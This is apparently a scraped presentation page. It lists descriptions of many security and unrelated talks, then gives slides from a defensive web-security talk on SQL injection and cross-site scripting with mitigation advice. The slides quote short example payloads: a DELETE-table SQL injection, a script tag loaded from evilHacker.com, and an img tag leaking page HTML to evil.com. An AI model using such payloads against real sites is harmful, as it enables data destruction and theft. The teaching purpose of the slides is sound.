Have you heard the words : "Why would anyone hack me?". Security is a serious problem that is often taken for granted and neglected by the product owners in favour of reliability and availability. In addition there are not many developers that are aware of the threats and the long-term harms that a simple attack could do. This session covers the most common web security threats on Web applications like XSS, XSRF, XSI, tampering, leakage, SQL injection and suggests mitigation solutions and coding guidelines.
PHP stands for “PHP: Hypertext Preprocessor”. It is very good for creating dynamic content. PHP is a widely-used, free, and efficient alternative to competitors such as Microsoft's ASP.
This presentation lays out the concept of the traditional web, the improvements web 2.0 have brought about, etc.
I have attempted to explain RIA as well.
The main part of this presentation is centered around ajax, its uses, advantages / disadvantages, framework considerations when using ajax, java-script hijacking, etc.
Hopefully it should be a good read as an intro doc to RIA and Ajax.
About Port Scanning
Used Nmap and Shadow Security scanner for the best outputs.
A Detailed description on performing the port scanning mostly for the network administrators.
How to perform? Why to perform? Where to perform? The basic factors are taken into considerations and are provided in the presentation.
PHP stands for “PHP: Hypertext Preprocessor”. It is very good for creating dynamic content. PHP is a widely-used, free, and efficient alternative to competitors such as Microsoft's ASP.
This presentation lays out the concept of the traditional web, the improvements web 2.0 have brought about, etc.
I have attempted to explain RIA as well.
The main part of this presentation is centered around ajax, its uses, advantages / disadvantages, framework considerations when using ajax, java-script hijacking, etc.
Hopefully it should be a good read as an intro doc to RIA and Ajax.
About Port Scanning
Used Nmap and Shadow Security scanner for the best outputs.
A Detailed description on performing the port scanning mostly for the network administrators.
How to perform? Why to perform? Where to perform? The basic factors are taken into considerations and are provided in the presentation.
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
Importance of cyber security in education sectorSeqrite
Data security in the education sector is incredibly important as the information collected by these institutes can be misused by hackers. This slideshare takes you through the security threats in education sector.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...Okan YILDIZ
Smishing and vishing are phishing attacks that lure victims via SMS messages and voice calls. Both rely on the same emotional appeals employed in traditional phishing scams and are designed to drive you into urgent action. The difference is the delivery method.
“Cyberthieves can apply manipulation techniques to many forms of communication because the underlying principles remain constant,” explains security awareness leader Stu Sjouwerman, CEO of KnowBe4. “Lure victims with bait and then catch them with hooks.”
+ Background & Basics of Web App Security, The HTTP Protocol, Web.
+ Application Insecurities, OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc), Remediation of Web App
+ Vulnerabilities, Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
Importance of cyber security in education sectorSeqrite
Data security in the education sector is incredibly important as the information collected by these institutes can be misused by hackers. This slideshare takes you through the security threats in education sector.
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications, but in proposing defensive measures for cross site scripting the websites validate the user input and determine if they are vulnerable to cross site scripting. The major considerations are input validation and output sanitization.
There are lots of defense techniques introduced nowadays and even though the coding methods used by developers are evolving to counter attack cross site scripting techniques, still the security threat persist in many web applications for the following reasons:
• The complexity of implementing the codes or methods.
• Non-existence of input data validation and output sanitization in all input fields of the application.
• Lack of knowledge in identifying hidden XSS issues etc.
This proposed project report will briefly discuss what cross site scripting is and highlight the security features and defense techniques that can help against this widely versatile attack.
Phishing, Smishing and vishing_ How these cyber attacks work and how to preve...Okan YILDIZ
Smishing and vishing are phishing attacks that lure victims via SMS messages and voice calls. Both rely on the same emotional appeals employed in traditional phishing scams and are designed to drive you into urgent action. The difference is the delivery method.
“Cyberthieves can apply manipulation techniques to many forms of communication because the underlying principles remain constant,” explains security awareness leader Stu Sjouwerman, CEO of KnowBe4. “Lure victims with bait and then catch them with hooks.”
This was the presentation I made to the @LeedsSharp group in Leeds 26/02/2015. It focusses on web application security and the steps you need to take to counter most of the threats which are out there today as determined by the OWASP Top 10. Solutions focus on the MVC.net framework, there is a source code project to go with this presentation with all of the solutions implemented at https://github.com/johnstaveley/SecurityEssentials
Anterior crossbites in primary & mixed dentition Orthodontic courses training...Indian dental academy
Welcome to Indian Dental Academy
The Indian Dental Academy is the Leader in continuing dental education , training dentists in all aspects of dentistry and offering a wide range of dental certified courses in different formats.
Indian dental academy has a unique training program & curriculum that provides students with exceptional clinical skills and enabling them to return to their office with high level confidence and start treating patients
State of the art comprehensive training-Faculty of world wide repute &Very affordable.
How To Design An All-Hands Meeting Your Employees Actually Want to AttendAndrew Fayad
Our team has grown fast, and All-Hands meetings have been a key factor in helping us maintain transparency, build engagement, and keep our company culture strong. We take our own experience, and what we've learned from the largest brands to show you how to design and implement an effective All-Hands Meeting at your company.
WAREHOUSING AND STORAGE IN SUPPLY CHAIN MANAGEMENTAjeesh Mk
This Presentation "Warehousing and storage in supply chain management" covers topics Warehouse and Storage, Warehouse Management, Functions, Economic and Service Benefit, Principles of Warehouse design, Kinds of Warehouse etc.
Bone replacement grafts are widely used to promote
bone formation and periodontal regeneration.
Xenografts are grafts shared between different species.
Currently, there are two available sources of xenografts
used as bone replacement grafts in periodontics: bovine
bone and natural coral.
Here you can find the slides that accompany my “SPA Secure Coding Guide”, this presentation go through a set of security best practices specially targeted towards developing Angular applications with ASP.Net Web Api backends.
It comes with a WebApi example project available on GitHub that provides several code examples of how to defend yourself. The example app is based on the famous "Tour of Heroes" Angular app used throughout the Angular documentation.
It first introduce general threat modelling before explaining the most current type of attacks Asp.Net Web API are vulnerable to .
It is designed to serve as a secure coding reference guide, to help development teams quickly understand Asp.Net Core secure coding practices.
Vulnerabilities in modern web applicationsNiyas Nazar
Microsoft powerpoint presentation for BTech academic seminar.This seminar discuses about penetration testing, penetration testing tools, web application vulnerabilities, impact of vulnerabilities and security recommendations.
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsSecuRing
OWASP - Open Web Applications Security Project to fundacja której celem jest eliminacja problemów bezpieczeństwa aplikacji. OWASP działa w duchu "open source" i dostarcza narzędzi, informacji i wiedzy pozwalających podnieść poziom bezpieczeństwa aplikacji. W trakcie wykładu przedstawię krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.
OWASP - Open Web Applications Security Project to fundacja której celem jest eliminacja problemów bezpieczeństwa aplikacji. OWASP działa w duchu "open source" i dostarcza narzędzi, informacji i wiedzy pozwalających podnieść poziom bezpieczeństwa aplikacji. W trakcie wykładu przedstawię krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.
Palestra ministrada no OWASP Floripa Day - Florianópolis - SC |
A palestra tem como objetivo mostrar os conceitos e funcionamento de algumas funcionalidades que foram adicionadas ao HTML5, levando em consideração os aspectos de segurança do client-side. Para as funcionalidades destacadas, foram criados cenários de ataques visando ilustrar a obtenção de informações sensíves armazenadas no browser ou até mesmo usar o browser da vítima para lançar ataques contra outros sistemas. Através da exploração das funcionalidades existentes no HTML5, técnicas de exploração como XSS e CSRF, tornam-se mais poderosas e eficientes, sendo possível em alguns casos contornar algumas restrições do Same Origin Policiy (SOP).
Making DevSecOps a Reality in your Spring ApplicationsHdiv Security
The adoption of DevOps and Continuous Delivery provides tangible benefits such as higher quality, stability, and faster release cadence. One of the most important issues within this adoption is related to security quality tasks that have been traditionally implemented manually.
The talk will demonstrate the security integration of Spring ecosystem demo applications with the Jenkins CI server to jump start continuous and in-depth security testing into the DevOps CI/CD pipeline, via automation and orchestration.
Cybersecurity and Generative AI - for Good and Bad vol.2Ivo Andreev
The presentation is an extended in-depth version review of cybersecurity challenges with generative AI, enriched with multiple demos, analysis, responsible AI topics and mitigation steps, also covering a broader scope beyond OpenAI service.
Popularity, demand and ease of access to modern generative AI technologies reveal new challenges in the cybersecurity landscape that vary from protecting confidentiality and integrity of data to misuse and abuse of technology by malicious actors. In this session we elaborate about monitoring and auditing, managing ethical implications and resolving common problems like prompt injections, jailbreaks, utilization in cyberattacks or generating insecure code.
Architecting AI Solutions in Azure for BusinessIvo Andreev
The topic is about Azure solution architectures that involve IoT and AI to solve common business domain problems. With near real time recommender system and an object detection with image recognition we review the architecture, build from the ground-up and illustrate how the typical realistic challenges could be addressed.
Cybersecurity Challenges with Generative AI - for Good and BadIvo Andreev
The presentation is an extended in-depth version review of cybersecurity challenges with generative AI, enriched with multiple demos, analysis, responsible AI topics and mitigation steps, also covering a broader scope beyond OpenAI service.
Popularity, demand and ease of access to modern generative AI technologies reveal new challenges in the cybersecurity landscape that vary from protecting confidentiality and integrity of data to misuse and abuse of technology by malicious actors. In this session we elaborate about monitoring and auditing, managing ethical implications and resolving common problems like prompt injections, jailbreaks, utilization in cyberattacks or generating insecure code.
JS-Experts - Cybersecurity for Generative AIIvo Andreev
Popularity, demand and ease of access to modern generative AI technologies reveal new challenges in the cybersecurity landscape that vary from protecting confidentiality and integrity of data to misuse and abuse of technology by malicious actors. In this session we elaborate about monitoring and auditing, managing ethical implications and resolving common problems like prompt injections, jailbreaks, utilization in cyberattacks or generating insecure code.
This is a totally different perspective of LLMs
How do OpenAI GPT Models Work - Misconceptions and Tips for DevelopersIvo Andreev
Have you ever wondered why GPT models work? Do you ask questions like:
◉ How does GPT work? Why does the same problem receive different answers for different users? Is there a way to improve explainability? ◉ Can GPT model provide its sources? Why does Bing chat work differently? What are my ways to have better performance and improve completions? ◉ How can I work with data in my enterprise? What practical business cases could a generative AI model fit solving?
If you are tired of sessions just scratching the surface of OpenAI GPT, this one will go deeper and answer questions like why, why not and how.
Key Terms; ChatGPT Enterprise; Top Questions; Enterprise Data; Azure Search; Functions; Embeddings; Context Encoding; General Intelligence; Emerging Abilities; Chain of Thought; Plugins; Multimodal with DALL-E; Project Florence
OpenAI GPT in Depth - Questions and MisconceptionsIvo Andreev
OpenAI GPT in depth – misconceptions and questions you would like answered
Have you ever wondered why GPT models work? Do you ask questions like:
How does GPT work? Why does the same problem receive different answers for different users? Is there a way to improve explainability? Can GPT model provide its sources? Why does Bing chat work differently? What are my ways to have better performance and improve completions? How can I work with data in my enterprise? What practical business cases could a generative AI model fit solving?
If you are tired of sessions just scratching the surface of OpenAI GPT, this one will go deeper and answer questions like why, why not and how.
Cutting Edge Computer Vision for EveryoneIvo Andreev
Microsoft offers a wide range of tools and advanced solutions to support you in managing computer vision related tasks.
From purely coding approaches with ML.NET, through zero-code ComputerVision.ai to advanced and flexible AI service in Azure ML, there is a solution for every need and each type of person.
From running on premises, through managed infrastructure to completely cloud services the speed of getting to the desired results and the return of investment are guaranteed.
Join this session to get insights about the options, deployment, pricing, pros and cons compared and select the most appropriate tech for your business case.
Collecting and Analysing Spaceborn DataIvo Andreev
Communicating with space and analysing satellite data
Azure reached beyond the clouds and bring space-born satellite data to your subscription for analysis and discovering insights.
Satellite as a service, Azure Orbital and a whole new ecosystem signal the ambition to push the limits and explore new opportunities.
In this session we are talking about geospatial AI-based analysis and a comprehensive flow that will allow you touch a vector of increasing importance for extending the cloud and helping businesses make tactical decisions.
Collecting and Analysing Satellite Data with Azure OrbitalIvo Andreev
Azure reached beyond the clouds and bring space-born satellite data to your subscription for analysis and discovering insights.
Satellite as a service, Azure Orbital and a whole new ecosystem signal the ambition to push the limits and explore new opportunities.
In this session we are talking about geospatial AI-based analysis and a comprehensive flow that will allow you touch a vector of increasing importance for extending the cloud and helping businesses make tactical decisions.
Azure Orbital - a fully managed cloud-based ground station as a service that enables you to communicate with your spacecrafts or satellites and generate products for customers.
AZ orbital handles machine-machine communication for the user based on the schedule and TLE location of satellites.
Azure software modules decrypt satellite data and prepare for usage.
Since Nov 2021 AZ cognitive for language is having a fresh tool – the Language Studio which is now in Preview. The studio offers multiple prebuilt and preconfigured models which allow you to quickly implement, test and deploy tasks like understanding conversational language, extracting information, classifying text or answering questions. But it goes further and offers multiple features to create, train and deploy custom models that model your data and serves your needs best. Language Studio does that by utilizing workflows that let developers build models without the need of ML knowledge and deploy the results as handy APIs.
Cosmos DB is among the top databases, with its strengths being in a flexible, extremely scalable hosted model, high SLA, low latency, globally distributed, automatic indexing, 2-dimensional redundancy and granular access level. But how does it suit IoT scenarios and for what scenarios is it appropriate?
Forecasting time series powerful and simpleIvo Andreev
Time series are a sequence of data points positioned in order of time. Time series forecasting has two main purposes - to understand the mechanisms that lead to rise or fall, and to predict future values. Very often it analyses trends, cyclical events, seasonality and has unique importance in Economics and Business. The quality of predictions can be evaluated only in future due to temporal dependencies on previous data points and there are many model types for approximation. In this session we are going to talk about challenges, ways of improvement and technology stack like ML.NET, ARIMA, Python, Azure ML, Regression and FB Prophet
Constrained Optimization with Genetic Algorithms and Project BonsaiIvo Andreev
Traditional machine learning requires volumes of labelled data that can be time consuming and expensive to produce,”
“Machine teaching leverages the human capability to decompose and explain concepts to train machine learning models
direction (teaching the correct answer is not by showing the data for it, but by using a person to show the answer).
Project Bonsai is a low code platform for intelligent solutions but with a different perspective on data it allows a completely new approach to tasks, especially when the physical world is involved. Under the hood it combines machine teaching, calibration and optimization to create intelligent control systems using simulations. The teaching curriculum is performed using a new language concept - “Inkling” and training a model is easy and interactive.
Azure security guidelines for developers Ivo Andreev
Azure security baselines and benchmarks, Security Maturity Model, Industrial Internet Consortium IIC , Certification, Web Application Firewall, API Management Service
Autonomous Machines with Project BonsaiIvo Andreev
Autonomous machines rely on fusion of many technologies to sense, plan, optimize and act as if an intelligent superhuman is in control.
Project Bonsai is a machine teaching service that combines machine learning (ML), calibration and optimization to create intelligent control systems using simulations. The teaching curriculum is performed using a proprietary “Inkling” language close to JavaScript and training a model is easy and interactive. Join this session for a Bonsai jump start and a demo and try it yourself – it is free.
Global azure virtual 2021 - Azure LighthouseIvo Andreev
Azure Lighthouse provides capabilities to perform cross-tenant management at scale.
We do this by providing you the ability to view and manage multiple customers from a single context.
Building a scalable business model in the cloud is a real challenge that is of uncomparable complexity compared to project-based solutions.
If you want to offer a solution in the cloud and onboard multiple customers, the next step would be to consider how would you deploy, maintain and monitor such environment. What is Azure Lighthouse and how to make your first steps following good practices is the response to that question and the main topic of our session.
Flux QL - Nexgen Management of Time Series Inspired by JSIvo Andreev
The time series landscape evolves fast to meet the aggressive challenges in IoT. Influx 2.0 Beta was released in the first days of 2020 and although being already Top 1 time series database it introduces a revolutionary change again. InfluxDB 2 is now generally available and its key features are originate from Flux - a functional and open source 4th generation analytical programming language inspired by JavaScript. Supported in VS Code it takes a new approach towards data exploration of time series data and enables some unmatched capabilities like enrichment and filtering of time series data with external data from RDBMS.
Azure architecture design patterns - proven solutions to common challengesIvo Andreev
Building a reliable, scalable, secure applications could happen either following verified design patterns or the hard way - following the trial and error approach. Azure architecture patterns are a tested and accepted solutions of common challenges thus reducing the technical risk to the project by not having to employ a new and untested design. However, most of the patterns are relevant to any distributed system, whether hosted on Azure or on other cloud platforms.
Industrial IoT from the Ground up with Azure and Open Source
IIoT leverages the power of machines and realtime analytics to pick up on industrial inefficiencies and problems sooner, and save time and money in addition to supporting BI efforts. In a myriad of reference architectures it is up to experience and trial-error to find out what really works in a real life scenario.
We will review the challenges and solutions in building an IIoT platform from the ground up on the edge between Azure and open source in order to have the best from both worlds. Technical focus will be on IoT Edge, TS Insights, Stream Analytics, IoT Hub, App Insights, Event Grid, Service Bus, ARM templates, Influx DB, Grafana and more - all neatly glued together by Azure Functions.
The Power of Auto ML and How Does it WorkIvo Andreev
Automated ML is an approach to minimize the need of data science effort by enabling domain experts to build ML models without having deep knowledge of algorithms, mathematics or programming skills. The mechanism works by allowing end-users to simply provide data and the system automatically does the rest by determining approach to perform particular ML task. At first this may sound discouraging to those aiming to the “sexiest job of the 21st century” - the data scientists. However, Auto ML should be considered as democratization of ML, rather that automatic data science.
In this session we will talk about how Auto ML works, how is it implemented by Microsoft and how it could improve the productivity of even professional data scientists.
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Hivelance Technology
Cryptocurrency trading bots are computer programs designed to automate buying, selling, and managing cryptocurrency transactions. These bots utilize advanced algorithms and machine learning techniques to analyze market data, identify trading opportunities, and execute trades on behalf of their users. By automating the decision-making process, crypto trading bots can react to market changes faster than human traders
Hivelance, a leading provider of cryptocurrency trading bot development services, stands out as the premier choice for crypto traders and developers. Hivelance boasts a team of seasoned cryptocurrency experts and software engineers who deeply understand the crypto market and the latest trends in automated trading, Hivelance leverages the latest technologies and tools in the industry, including advanced AI and machine learning algorithms, to create highly efficient and adaptable crypto trading bots
Modern design is crucial in today's digital environment, and this is especially true for SharePoint intranets. The design of these digital hubs is critical to user engagement and productivity enhancement. They are the cornerstone of internal collaboration and interaction within enterprises.
Large Language Models and the End of ProgrammingMatt Welsh
Talk by Matt Welsh at Craft Conference 2024 on the impact that Large Language Models will have on the future of software development. In this talk, I discuss the ways in which LLMs will impact the software industry, from replacing human software developers with AI, to replacing conventional software with models that perform reasoning, computation, and problem-solving.
Developing Distributed High-performance Computing Capabilities of an Open Sci...Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
Why React Native as a Strategic Advantage for Startup Innovation.pdfayushiqss
Do you know that React Native is being increasingly adopted by startups as well as big companies in the mobile app development industry? Big names like Facebook, Instagram, and Pinterest have already integrated this robust open-source framework.
In fact, according to a report by Statista, the number of React Native developers has been steadily increasing over the years, reaching an estimated 1.9 million by the end of 2024. This means that the demand for this framework in the job market has been growing making it a valuable skill.
But what makes React Native so popular for mobile application development? It offers excellent cross-platform capabilities among other benefits. This way, with React Native, developers can write code once and run it on both iOS and Android devices thus saving time and resources leading to shorter development cycles hence faster time-to-market for your app.
Let’s take the example of a startup, which wanted to release their app on both iOS and Android at once. Through the use of React Native they managed to create an app and bring it into the market within a very short period. This helped them gain an advantage over their competitors because they had access to a large user base who were able to generate revenue quickly for them.
Listen to the keynote address and hear about the latest developments from Rachana Ananthakrishnan and Ian Foster who review the updates to the Globus Platform and Service, and the relevance of Globus to the scientific community as an automation platform to accelerate scientific discovery.
Advanced Flow Concepts Every Developer Should KnowPeter Caitens
Tim Combridge from Sensible Giraffe and Salesforce Ben presents some important tips that all developers should know when dealing with Flows in Salesforce.
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Globus
The U.S. Geological Survey (USGS) has made substantial investments in meeting evolving scientific, technical, and policy driven demands on storing, managing, and delivering data. As these demands continue to grow in complexity and scale, the USGS must continue to explore innovative solutions to improve its management, curation, sharing, delivering, and preservation approaches for large-scale research data. Supporting these needs, the USGS has partnered with the University of Chicago-Globus to research and develop advanced repository components and workflows leveraging its current investment in Globus. The primary outcome of this partnership includes the development of a prototype enterprise repository, driven by USGS Data Release requirements, through exploration and implementation of the entire suite of the Globus platform offerings, including Globus Flow, Globus Auth, Globus Transfer, and Globus Search. This presentation will provide insights into this research partnership, introduce the unique requirements and challenges being addressed and provide relevant project progress.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet’s largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data, and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on-demand, capable of applying many data reduction and data analysis to the large ESGF data archives, transferring only the resultant analysis (ex. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
Cyaniclab : Software Development Agency Portfolio.pdfCyanic lab
CyanicLab, an offshore custom software development company based in Sweden,India, Finland, is your go-to partner for startup development and innovative web design solutions. Our expert team specializes in crafting cutting-edge software tailored to meet the unique needs of startups and established enterprises alike. From conceptualization to execution, we offer comprehensive services including web and mobile app development, UI/UX design, and ongoing software maintenance. Ready to elevate your business? Contact CyanicLab today and let us propel your vision to success with our top-notch IT solutions.
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Understanding Globus Data Transfers with NetSageGlobus
NetSage is an open privacy-aware network measurement, analysis, and visualization service designed to help end-users visualize and reason about large data transfers. NetSage traditionally has used a combination of passive measurements, including SNMP and flow data, as well as active measurements, mainly perfSONAR, to provide longitudinal network performance data visualization. It has been deployed by dozens of networks world wide, and is supported domestically by the Engagement and Performance Operations Center (EPOC), NSF #2328479. We have recently expanded the NetSage data sources to include logs for Globus data transfers, following the same privacy-preserving approach as for Flow data. Using the logs for the Texas Advanced Computing Center (TACC) as an example, this talk will walk through several different example use cases that NetSage can answer, including: Who is using Globus to share data with my institution, and what kind of performance are they able to achieve? How many transfers has Globus supported for us? Which sites are we sharing the most data with, and how is that changing over time? How is my site using Globus to move data internally, and what kind of performance do we see for those transfers? What percentage of data transfers at my institution used Globus, and how did the overall data transfer performance compare to the Globus users?
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
top nidhi software solution freedownloadvrstrong314
This presentation emphasizes the importance of data security and legal compliance for Nidhi companies in India. It highlights how online Nidhi software solutions, like Vector Nidhi Software, offer advanced features tailored to these needs. Key aspects include encryption, access controls, and audit trails to ensure data security. The software complies with regulatory guidelines from the MCA and RBI and adheres to Nidhi Rules, 2014. With customizable, user-friendly interfaces and real-time features, these Nidhi software solutions enhance efficiency, support growth, and provide exceptional member services. The presentation concludes with contact information for further inquiries.
Unleash Unlimited Potential with One-Time Purchase
BoxLang is more than just a language; it's a community. By choosing a Visionary License, you're not just investing in your success, you're actively contributing to the ongoing development and support of BoxLang.
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...informapgpstrackings
Keep tabs on your field staff effortlessly with Informap Technology Centre LLC. Real-time tracking, task assignment, and smart features for efficient management. Request a live demo today!
For more details, visit us : https://informapuae.com/field-staff-tracking/
Check out the webinar slides to learn more about how XfilesPro transforms Salesforce document management by leveraging its world-class applications. For more details, please connect with sales@xfilespro.com
If you want to watch the on-demand webinar, please click here: https://www.xfilespro.com/webinars/salesforce-document-management-2-0-smarter-faster-better/
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Globus Connect Server Deep Dive - GlobusWorld 2024
Web Security Threats and Solutions
1. var title =
“Web Security Threats and Solutions”;
var info = {
name: “Ivelin Andreev”,
otherOptional: “Security is not for granted”
Sofia
NovN 2o3v ,2 23,0 210414
};
2. Nov 23, 2014
About me
• Project Manager @
o 12 years professional experience
o .NET Web Development MCPD
o SQL Server 2012 (MCSA)
• Business Interests
o Web Development, SOA, Integration
o Security & Performance Optimization
o Horizon2020, Open BIM, GIS, Mapping
• Contact me
o ivelin.andreev@icb.bg
o www.linkedin.com/in/ivelin
o www.slideshare.net/ivoandreev
3. Nov 23, 2014
Web Security is Important
Common misconceptions
• I am using ASP.NET ?!?!
• I am too small to be noticed by crackers
• I am too busy for security, my brand is important
• I am not operating in the financial industry
• Security seal means nothing for customers
• Hosting provider does not matter
4. Nov 23, 2014
agenda();
• SQL Injection
• Cross-Site Scripting (CSS)
• Cross-Site Request Forgery (CSRF)
• Cross-Site Script Inclusion (CSSI)
• Parameter Tampering
• Information Leakage
• Distributed Denial of Service
• Demo
5. SQL injection is so old...
Nov 23, 2014
Don’t developers know any better?
6. Nov 23, 2014
SQL Injection
Def: Commands or logic inserted in SQL data channel
• Common Reasons
o Dynamic query statements and string operations
o Poor programming
• Impact
o Leak or loss of data
o Authentication and authorization
• Impact (you many have not considered)
o Damages limited only by the SQL account permissions
o Windows authentication user rights can be exploited
o Modify server security configuration
o Install backdoors
8. Nov 23, 2014
(Pseudo) Solutions
• Replace special symbols (-, “, ‘)
o Data with special symbols not searchable
o Poor routines can create vulnerable query (i.e. –’–)
• Smuggling
o Looks like a quote but not a quote - conversion on DB level
o OWASP_IL_2007_SQL_Smuggling.pdf
• NOSQL is not vulnerable
o NOSQL is also vulnerable (i.e. MongoDB with JavaScript)
• Second order attacks
o Validate request only
o Data stored in the DB and later used in prepared queries
9. Using Parameters (in wrong manner)
Nov 23, 2014
• Dynamic queries (sp_executesql vs. EXEC)
o exec (@sqlString) – executes T-SQL string
o sp_executesql allows for statements to be parameterized
o sp_executesql is more secure in terms of SQL injection
• Developer believes dynamic SQL is the only option
CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS
DECLARE @sql nvarchar(255)
SET @sql = 'SELECT UserName FROM Users ' + @Sort
EXECUTE sp_executesql @sql
GO
o What if @Sort = ‘‘; DELETE FROM Users’
CREATE PROCEDURE GetUsers @Sort Int AS
SELECT UserName FROM Users ORDER BY
CASE WHEN @Sort = 1 THEN ( Rank() OVER (ORDER BY UserName ASC) ) END
GO
10. Nov 23, 2014
Prevention & Mitigation
• Parameterized queries and prepared statements
o Use parameters where data are expected
o ORMs use parameters (Nhibernate, Entity Framework)
• “The least privilege” principle
o Grant the minimum access rights
o Parameterized queries vs. Stored Procedure permissions
• Positive input validation (Poor)
o Regular expressions / White lists (i.e. alphanumeric)
• IIS Request Query Filtering (Poor)
o filtering-for-sql-injection-on-iis-7-and-later
• SQL injection and DB takeover
o http://ha.ckers.org/sqlinjection/
o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/
11. SQL Injection with Entity Framework
Nov 23, 2014
• Entity Framework Raw Queries
string query = “query” + “SQL injection code”
dbContext.Database.SqlQuery<string>(query).ToList();
o Security Considerations (Entity Framework)
• IQueryable
o Can result in untrusted calls
o If provided as a library, can be casted to Context and connection
var orders = repository.GetOrders(5);
var context = ((ObjectQuery)orders).Context
o Use IEnumerable instead
13. Nov 23, 2014
Cross Site Scripting (XSS)
Def: Untrusted content displayed on page unencoded
• Case
o evilHacker injects <script> in http://goodSite.com application context
• By posting HTML form field
• By tricking user to click link with query parameters sent by mail
%3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E
• XSS Source
o Query parameters, HTML form fields
o HTML Attributes (onload, onblur)
o URI requested and displayed in HTTP 404 page
o Data from DB or file system
o 3rd party data - RSS feeds or service
14. Nov 23, 2014
XSS – an Underestimated Threat
• Create or access any DOM element
• Hijack cookies, credentials or actions
• Take control over victim machine
Browser Exploitation Framework Project
o Open source penetration testing tool
o XSS vulnerability allows injection of BeEF
o Victim browser is hooked
o Perform actions/attacks on behalf of the victim
o Exploit system in browser context
15. Nov 23, 2014
Persisted XSS
• Attacker stores malicious data on server
• Unvalidated data displayed on page w/o encoding
• Store once – run many
16. Nov 23, 2014
Reflected XSS
• Malicious client data is immediately used by server
• Unvalidated data displayed on page w/o encoding
• Requires social engineering
o Convince users to follow a URL (via e-mail or forum comment)
• Detection Tools
o OWASP Xenotix XSS Exploit Framework
o XSS-ME FireFox plugin
17. Nov 23, 2014
Client XSS & HTML Injection
• DOM-based XSS
o Malicious data executed as a part of DOM manipulation
o Requires social engineering
document.write(“
<OPTION value=1>"+document.location.href.substring(…) + ”</OPTION>");
• Dangling Markup HTML injection
o Image source w/o closing tag
o On load of image – a request is made to attacker’s site
<img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter
...
<input type="hidden" name=“SecretField" value="12345">
...
'← Normally-occurring apostrophe somewhere in page text
o HTML leaks to evil site
19. Nov 23, 2014
XSS Prevention & Mitigation
• HTML escape then JavaScript escape
• Encode on usage, not appearance
o HttpUtility.HtmlEncode(string)
o HttpUtility.JavaScriptStringEncode(string)
o Microsoft Anti-Cross Site Scripting Library
• Use proven sanitizers
o Blacklist vs. Whitelist
o Valid JavaScript can be created by poor filtering routine
<SscriptCscriptRscriptIscriptPscriptTscript>…
• Check 3rd party resources (i.e. jQuery plugins)
• Analyze places where DOM elements are created
o Use document.createElement() rather than $(obj).html()
